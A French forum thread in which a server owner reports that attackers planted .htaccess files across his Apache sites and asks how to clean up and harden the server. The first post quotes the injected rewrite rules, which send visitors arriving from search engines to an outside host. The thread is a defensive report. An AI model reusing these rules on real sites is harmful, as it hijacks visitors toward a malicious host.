IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Apache Discussion :

Attaque serveur par .htaccess [Fait]


Sujet :

Apache

  1. #1
    Membre du Club
    Inscrit en
    Avril 2005
    Messages
    105
    Détails du profil
    Informations forums :
    Inscription : Avril 2005
    Messages : 105
    Points : 49
    Points
    49
    Par défaut Attaque serveur par .htaccess
    Bonsoir,
    je viens de subir une attaque sur mon serveur.

    Dans chacun des répertoires contenant mes sites web, des fichiers .htaccess ont été ajouté (et ont remplacés les anciens)
    ils contiennent les données suivantes
    RewriteEngine on
    Options +FollowSymLinks

    RewriteCond %{HTTP_REFERER} ^.*(google|live|yahoo|ask|msn|aol|altavista).*$ [NC]
    RewriteRule .*$ http://rostoffhost.info/strf/ [L]
    Quelqu'un peut il m'aider pour résoudre ce probléme et me renvoyer vers un tutoriel pour sécuriser mon serveur?

    Description du serveur:
    Systeme: ubuntu
    Serveur: apache2
    Ispconfig installer sur apache1
    Technologie: php5, mysql5

    Le firewall ispconfig est activé

    Y'a t'il une solution pour eviter ce genre d'attaque (antivirus, anti rootkik)

    ps: je viens d'installer pour l'un des sites (joomla 1.013)

    ps: comment savoir ce qui a etait modifie et par qui?

    Merci d'avance pour votre aide

    Cordialement,
    Thibaut

  2. #2
    Candidat au Club
    Profil pro
    Inscrit en
    Mars 2007
    Messages
    5
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mars 2007
    Messages : 5
    Points : 2
    Points
    2
    Par défaut
    Hello,

    je suppose que tu as aussi une dedibox.

    Voici un topic sur Ubuntu-fr.org qui en parle :
    http://forum.ubuntu-fr.org/viewtopic.php?id=142473&p=3

  3. #3
    Membre du Club
    Inscrit en
    Avril 2005
    Messages
    105
    Détails du profil
    Informations forums :
    Inscription : Avril 2005
    Messages : 105
    Points : 49
    Points
    49
    Par défaut
    Je te remercie pour l'info
    bonne soiree

+ Répondre à la discussion
Cette discussion est résolue.

Discussions similaires

  1. Réponses: 6
    Dernier message: 12/06/2010, 10h40
  2. Réponses: 4
    Dernier message: 03/07/2008, 19h55
  3. Réponses: 4
    Dernier message: 10/07/2005, 20h53
  4. [VB.NET] Appeler un évènement serveur par JS...
    Par Rami dans le forum ASP.NET
    Réponses: 5
    Dernier message: 17/05/2004, 17h27

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo